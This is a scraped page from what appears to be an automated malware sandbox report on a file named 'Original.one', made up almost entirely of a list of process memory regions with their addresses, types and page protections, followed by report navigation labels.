page read and write

25E8443D000

heap

page read and write

27D4FF44000

heap

page read and write

1D1AF043000

heap

page read and write

21CCD650000

heap

page read and write

D52EC3F000

stack

page read and write

1C61F1E5000

heap

page read and write

22E00B13000

heap

page read and write

22E00A5C000

heap

page read and write

4E1287D000

stack

page read and write

27D4E4C0000

trusted library allocation

page read and write

D52E77E000

stack

page read and write

27D6010F000

trusted library allocation

page read and write

1B2E7C49000

heap

page read and write

182F9475000

heap

page read and write

27D68730000

trusted library allocation

page read and write

24C1CD13000

heap

page read and write

62C96FD000

stack

page read and write

7FFBAD26D000

trusted library allocation

page execute and read and write

25E84413000

heap

page read and write

21CCE4A0000

trusted library allocation

page read and write

27D504F4000

trusted library allocation

page read and write

27D4FFAC000

heap

page read and write

27D4E525000

heap

page read and write

27D4FF39000

heap

page read and write

2789EA79000

heap

page read and write

22E007C0000

heap

page read and write

21CCD640000

heap

page read and write

1B2E7C44000

heap

page read and write

27D4FFD8000

heap

page read and write

246E6A02000

heap

page read and write

1B408902000

heap

page read and write

246E69E0000

remote allocation

page read and write

2789EA44000

heap

page read and write

1B2EB380000

trusted library allocation

page read and write

27D506EE000

trusted library allocation

page read and write

22E00930000

trusted library allocation

page read and write

27D4E5E0000

heap

page read and write

2789EA41000

heap

page read and write

1D1AF084000

heap

page read and write

22E023E0000

remote allocation

page read and write

39465FF000

stack

page read and write

677537F000

stack

page read and write

182F91F0000

heap

page read and write

7FFBAD4F0000

trusted library allocation

page read and write

2789E960000

trusted library allocation

page read and write

2789EA60000

heap

page read and write

1D1AF96F000

heap

page read and write

27D68711000

trusted library allocation

page read and write

22E007D0000

heap

page read and write

1D1AF990000

heap

page read and write

25E84400000

heap

page read and write

27D4FEA0000

trusted library allocation

page read and write

16B0CFE000

stack

page read and write

4E12CFF000

stack

page read and write

16B0D7D000

stack

page read and write

1B40883D000

heap

page read and write

1D1AF06A000

heap

page read and write

D52E8F9000

stack

page read and write

9D1F47E000

stack

page read and write

1D1AF922000

heap

page read and write

182F9402000

heap

page read and write

27D4FFAC000

heap

page read and write

7FFBAD4D0000

trusted library allocation

page read and write

D52E2E5000

stack

page read and write

246E6920000

heap

page read and write

7FFBAD490000

trusted library allocation

page read and write

27D4FF33000

heap

page read and write

27D4E240000

heap

page read and write

2789EA82000

heap

page read and write

16B0DFF000

stack

page read and write

24C1C4CC000

heap

page read and write

2789EA29000

heap

page read and write

27D50627000

trusted library allocation

page read and write

1B2E7C3A000

heap

page read and write

2789EA13000

heap

page read and write

2789EA6B000

heap

page read and write

27D4E5D1000

trusted library allocation

page read and write

24C1C300000

heap

page read and write

27D4E2AC000

heap

page read and write

27D686F0000

heap

page execute and read and write

1C61F110000

heap

page read and write

246E6A58000

heap

page read and write

25E84402000

heap

page read and write

DBF8D8B000

stack

page read and write

21CCD985000

heap

page read and write

1B409002000

trusted library allocation

page read and write

7FFBAD316000

trusted library allocation

page read and write

27D4E4D0000

heap

page readonly

27D4FFB8000

heap

page read and write

27D4E1D0000

heap

page read and write

1D1AF943000

heap

page read and write

27D50566000

trusted library allocation

page read and write

21CCD590000

heap

page read and write

27D4E2F2000

heap

page read and write

27D4E2F4000

heap

page read and write

27D68720000

trusted library allocation

page read and write

7FFBAD4A0000

trusted library allocation

page read and write

27D4E460000

heap

page read and write

182F9502000

heap

page read and write

24C1C400000

heap

page read and write

246E69B0000

trusted library allocation

page read and write

2789EA64000

heap

page read and write

1B2E7C67000

heap

page read and write

8F7B8FD000

stack

page read and write

A006CF9000

stack

page read and write

1C61F20B000

heap

page read and write

27D500A0000

heap

page execute and read and write

1F8C7B000

stack

page read and write

1B408800000

heap

page read and write

182F9200000

heap

page read and write

7FFBAD5B0000

trusted library allocation

page read and write

25E8442E000

heap

page read and write

394627E000

stack

page read and write

2789EA5A000

heap

page read and write

22E00B18000

heap

page read and write

1B40886C000

heap

page read and write

16B0C7B000

stack

page read and write

1B2E7C43000

heap

page read and write

4E12AFE000

stack

page read and write

27D5068A000

trusted library allocation

page read and write

7FFBAD310000

trusted library allocation

page read and write

1C620B50000

heap

page read and write

27D500D3000

trusted library allocation

page read and write

62C9A7F000

stack

page read and write

1D1AFA02000

heap

page read and write

27D4FFE2000

heap

page read and write

1D1AF1E5000

heap

page read and write

27D50192000

trusted library allocation

page read and write

9D1F5FE000

stack

page read and write

1C61F1E0000

heap

page read and write

1D1AF9C8000

heap

page read and write

1B2E7C4D000

heap

page read and write

27D4E4A0000

trusted library allocation

page read and write

27D4FFB5000

heap

page read and write

25E84437000

heap

page read and write

1B2E7D8B000

heap

page read and write

8F7B1DB000

stack

page read and write

27D50655000

trusted library allocation

page read and write

182F9C02000

trusted library allocation

page read and write

24C1C513000

heap

page read and write

27D600C0000

trusted library allocation

page read and write

1B40885C000

heap

page read and write

2789E7F0000

heap

page read and write

24C1CD00000

heap

page read and write

7FFBAD570000

trusted library allocation

page read and write

1B408640000

heap

page read and write

7FFBAD31C000

trusted library allocation

page execute and read and write

2789EA67000

heap

page read and write

8F7BA7D000

stack

page read and write

27D68710000

trusted library allocation

page read and write

62C987F000

stack

page read and write

1B2E7C3E000

heap

page read and write

22E00A5B000

heap

page read and write

25E84270000

heap

page read and write

D52E93E000

stack

page read and write

24C1C489000

heap

page read and write

9D1F7FE000

stack

page read and write

4E128FB000

stack

page read and write

21CCD530000

trusted library allocation

page read and write

1B408889000

heap

page read and write

27D5067F000

trusted library allocation

page read and write

1F927F000

stack

page read and write

182F9457000

heap

page read and write

27D4FEB0000

heap

page read and write

4E129FC000

stack

page read and write

1C61F0F0000

heap

page read and write

2789EA57000

heap

page read and write

27D50504000

trusted library allocation

page read and write

24C1C4BB000

heap

page read and write

9D1F8FF000

stack

page read and write

4E123FB000

stack

page read and write

27D4E31F000

heap

page read and write

2789EA56000

heap

page read and write

246E7202000

trusted library allocation

page read and write

4E125FF000

stack

page read and write

B703F0F000

stack

page read and write

22E00A40000

heap

page read and write

1D1AF056000

heap

page read and write

24C1C4CA000

heap

page read and write

39463F9000

stack

page read and write

D52E9B7000

stack

page read and write

22E00A02000

heap

page read and write

1D1AEFB0000

trusted library allocation

page read and write

1D1AF18E000

heap

page read and write

1B2E7C00000

heap

page read and write

1B4086A0000

heap

page read and write

24C1C46F000

heap

page read and write

1B40885B000

heap

page read and write

2789EB02000

heap

page read and write

7FFBAD320000

trusted library allocation

page execute and read and write

1D1AF922000

heap

page read and write

1B2E7BE0000

heap

page read and write

D52EBBF000

stack

page read and write

D52E67F000

stack

page read and write

27D4FFCB000

heap

page read and write

27D5064C000

trusted library allocation

page read and write

39467FA000

stack

page read and write

27D5001B000

heap

page read and write

25E8442A000

heap

page read and write

2789EA7C000

heap

page read and write

246E69E0000

remote allocation

page read and write

7FFBAD510000

trusted library allocation

page read and write

7FFBAD470000

trusted library allocation

page read and write

27D5000D000

heap

page read and write

21CCD68F000

heap

page read and write

27D4E2CC000

heap

page read and write

25E84444000

heap

page read and write

27D4FF17000

heap

page execute and read and write

182F9479000

heap

page read and write

39464FA000

stack

page read and write

22E00A67000

heap

page read and write

1D1AEF20000

heap

page read and write

1D1AF9C0000

heap

page read and write

1D1AEF10000

heap

page read and write

25E84260000

heap

page read and write

27D5001E000

heap

page read and write

6774B7B000

stack

page read and write

1C61F200000

heap

page read and write

27D4E35C000

heap

page read and write

1D1AF1B9000

heap

page read and write

21CCD648000

heap

page read and write

A0066DC000

stack

page read and write

DBF937F000

stack

page read and write

2789EA5C000

heap

page read and write

2789EA00000

heap

page read and write

22E00A4B000

heap

page read and write

27D5017A000

trusted library allocation

page read and write

182F9413000

heap

page read and write

1B408863000

heap

page read and write

246E6A29000

heap

page read and write

D52ECBB000

stack

page read and write

7FFBAD430000

trusted library allocation

page execute and read and write

24C1C43E000

heap

page read and write

182F9428000

heap

page read and write

27D5065E000

trusted library allocation

page read and write

182F9500000

heap

page read and write

27D4FF50000

heap

page read and write

7FFBAD4B0000

trusted library allocation

page read and write

7FFBAD460000

trusted library allocation

page read and write

A006DFE000

stack

page read and write

1D1AF802000

heap

page read and write

27D4E4E0000

trusted library allocation

page read and write

27D50090000

heap

page read and write

27D4E278000

heap

page read and write

27D50688000

trusted library allocation

page read and write

25E84C02000

trusted library allocation

page read and write

22E00A2A000

heap

page read and write

22E00A4A000

heap

page read and write

1D1AF029000

heap

page read and write

1B2E7C5E000

heap

page read and write

7FFBAD264000

trusted library allocation

page read and write

D52E6FD000

stack

page read and write

21CCD930000

trusted library allocation

page read and write

There are 503 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
Original.one

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportOriginal.one

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
Original.one